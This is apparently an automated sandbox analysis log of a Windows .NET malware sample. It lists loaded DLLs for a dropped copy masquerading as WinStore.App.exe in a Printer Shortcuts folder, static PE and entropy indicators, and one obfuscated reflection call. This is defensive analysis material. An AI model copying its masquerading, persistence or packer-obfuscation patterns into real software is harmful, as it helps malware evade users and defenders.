Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\67VB5TS184.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 67VB5TS184.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 67VB5TS184.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 67VB5TS184.exe

Static file information: File size 1914880 > 1048576

Source: 67VB5TS184.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1d3000

Source: 67VB5TS184.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mscorlib.pdb source: WinStore.App.exe, 00000011.00000002.2430632758.000000001B5E3000.00000004.00000020.00020000.00000000.sdmp, WinStore.App.exe, 00000035.00000002.3253097663.000000001B99C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Formsib.pdb source: WinStore.App.exe, 00000035.00000002.3253097663.000000001B9AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: system.windows.forms.dllib.pdb source: WinStore.App.exe, 0000002B.00000002.3038773642.000000001B8C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Formsib.pdb. source: WinStore.App.exe, 00000030.00000002.3127795731.000000001AFC6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Accessibility.pdbAY source: WinStore.App.exe, 00000011.00000002.2430632758.000000001B5E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bb.pdb-) source: WinStore.App.exe, 00000021.00000002.2783241137.000000001B600000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: b.pdb source: WinStore.App.exe, 00000021.00000002.2783241137.000000001B689000.00000004.00000020.00020000.00000000.sdmp, WinStore.App.exe, 00000026.00000002.2915572093.000000001BBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Formsib.pdbD source: WinStore.App.exe, 00000016.00000002.2520278011.000000001B326000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Formsib.pdbi;V0< source: WinStore.App.exe, 0000002B.00000002.3038773642.000000001B8C2000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 67VB5TS184.exe, Gp6SmQpVEw7W7SPVvrP.cs

.Net Code: Type.GetTypeFromHandle(v1GXUmLQ6AhED5Ssyh0.GOK6W4qobrY(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(v1GXUmLQ6AhED5Ssyh0.GOK6W4qobrY(16777245)),Type.GetTypeFromHandle(v1GXUmLQ6AhED5Ssyh0.GOK6W4qobrY(16777259))})

Source: C:\Users\user\Desktop\67VB5TS184.exe	Code function: 0_2_00007FF8471500BD pushad ; iretd	0_2_00007FF8471500C1
Source: C:\Users\user\Desktop\67VB5TS184.exe	Code function: 0_2_00007FF84715537E pushad ; ret	0_2_00007FF847155383
Source: C:\Users\user\Desktop\67VB5TS184.exe	Code function: 0_2_00007FF84754C786 push ebp; ret	0_2_00007FF84754C788
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 6_2_00007FF848F3537E pushad ; ret	6_2_00007FF848F35383
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 6_2_00007FF84932C81C push esp; ret	6_2_00007FF84932C81D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 6_2_00007FF84932C796 push ss; retf	6_2_00007FF84932C797
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 12_2_00007FF848F48651 push es; iretd	12_2_00007FF848F48659
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 12_2_00007FF848F47ED7 push ecx; ret	12_2_00007FF848F47EDC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 12_2_00007FF848F491F6 push esi; ret	12_2_00007FF848F49209
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 12_2_00007FF848F3537E pushad ; ret	12_2_00007FF848F35383
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 12_2_00007FF84932C81C push esp; ret	12_2_00007FF84932C81D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 12_2_00007FF84932C796 push ss; retf	12_2_00007FF84932C797
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 17_2_00007FF848F2537E pushad ; ret	17_2_00007FF848F25383
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 17_2_00007FF84931C81C push esp; ret	17_2_00007FF84931C81D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 17_2_00007FF84931C796 push ss; retf	17_2_00007FF84931C797
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 22_2_00007FF848F3537E pushad ; ret	22_2_00007FF848F35383
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 22_2_00007FF848F48651 push es; iretd	22_2_00007FF848F48659
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 22_2_00007FF848F47ED7 push ecx; ret	22_2_00007FF848F47EDC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 22_2_00007FF848F491F6 push esi; ret	22_2_00007FF848F49209
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 22_2_00007FF84932C81C push esp; ret	22_2_00007FF84932C81D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 22_2_00007FF84932C796 push ss; retf	22_2_00007FF84932C797
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 28_2_00007FF848F38651 push es; iretd	28_2_00007FF848F38659
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 28_2_00007FF848F37ED7 push ecx; ret	28_2_00007FF848F37EDC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 28_2_00007FF848F391F6 push esi; ret	28_2_00007FF848F39209
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 28_2_00007FF848F2537E pushad ; ret	28_2_00007FF848F25383
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 28_2_00007FF84931C81C push esp; ret	28_2_00007FF84931C81D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 28_2_00007FF84931C796 push ss; retf	28_2_00007FF84931C797
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 33_2_00007FF848F1537E pushad ; ret	33_2_00007FF848F15383
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 33_2_00007FF84930E300 push ebp; ret	33_2_00007FF84930E301
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 33_2_00007FF84930C81C push esp; ret	33_2_00007FF84930C81D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Code function: 33_2_00007FF84930C796 push ss; retf	33_2_00007FF84930C797

Source: 67VB5TS184.exe	Static PE information: section name: .text entropy: 7.540715561915618
Source: hjAOLvfTLePJensZtANoSVrh.exe.0.dr	Static PE information: section name: .text entropy: 7.540715561915618
Source: hjAOLvfTLePJensZtANoSVrh.exe0.0.dr	Static PE information: section name: .text entropy: 7.540715561915618
Source: WinStore.App.exe.0.dr	Static PE information: section name: .text entropy: 7.540715561915618
Source: SystemSettings.exe.0.dr	Static PE information: section name: .text entropy: 7.540715561915618

Source: 67VB5TS184.exe, XC92nmlZcLs8UZCE9Os.cs	High entropy of concatenated method names: 'LMllfICsnf', 'C3SusyrXy2BJUfibPxdu', 'HqSrHgrXsYLdy4hVpGhp', 'FOStibrXKH4sdawdjcoU', 'yrOmmbrXdPgjrmQXtRiM', 'sUfAFYrXxayHmwS50siQ', 'm0SPr9rXw8ql1Y6S3pHV', 'Q2nlhMeIrf', 'UvQl2jrYg5', 'ITKlH9smMH'
Source: 67VB5TS184.exe, xk8BYpvRQnJJo1Udohx.cs	High entropy of concatenated method names: 'pCWvAfPBOj', 'jRmv39kCvM', 'ltHvKxm2LU', 'Psevd9Ctwu', 'VIivyI3XVJ', 'UPVvsl7oUu', 'n9svxcGgxb', 'IoGvw1GNq9', 'uKrvSfxDHt', 'z41vIhiYOw'
Source: 67VB5TS184.exe, yOJshEubrwljyUNmWRg.cs	High entropy of concatenated method names: 'nGTuLe1sdi', 'FUWuz8mvG3', 'GTxu35DkCi', 'r5suKhVgb7', 'XajudgtY1o', 'Tlduy9Zsf1', 'd7CusHQvXo', 'KgeuxUP5h9', 'fCJuwZTnUY', 'ISIuSnBQMm'
Source: 67VB5TS184.exe, tAsZ83cJPlDfZqUXCEx.cs	High entropy of concatenated method names: 'anMc90iyok', 'whKuhcrahfMEtNSL4Mnb', 'z58MKrra2NJYPXUqWfI2', 'uuhp0praZZvtsjvP38Qo', 'FajkvlraGNYdcemTmRvC', 'jJdT7uraHZ3vbKQJaBPe', 'IPy', 'method_0', 'method_1', 'method_2'
Source: 67VB5TS184.exe, PBtWYu6wL4teoEaNgqa.cs	High entropy of concatenated method names: 'z8tBlA4ms9', 'ER9ip9rvB7EDmwZ0aos9', 'XF3pMFrvmDVUFE8nDFgN', 'QtD0O4rvWTRL2T9X8bwN', 'd1s4pUrvrBlMvHXPBUfk', 'XkmosKrv62XoNHOxQQka', 'E0mo4vrvPHXwSO6oc7sX', 'x2bBkY0r26', 'weHB6q9Acq', 'QaNBBSrStx'
Source: 67VB5TS184.exe, tYMaWk93ZCA9tp209uF.cs	High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'VYE9d5d8x2', 'Klv9y5olOC', 'Dispose', 'D31', 'wNK'
Source: 67VB5TS184.exe, nldXD90aeJ3vp9f6dSt.cs	High entropy of concatenated method names: 'VIY0iv7fS3', 'Eij0pj3D5O', 'gaZ0FmUUFK', 'iPj7GKrdN3LHGtf0AWLt', 'MX8NS6rd8raZyfnimsRk', 'VXVACZrdQDQ6vOb9hplI', 'qx95n3rdOxkuxb0iPvZ8', 'ymbhFjrdniHDdPjjpPoN', 'SjbthErdVfcvuSF7nlfi'
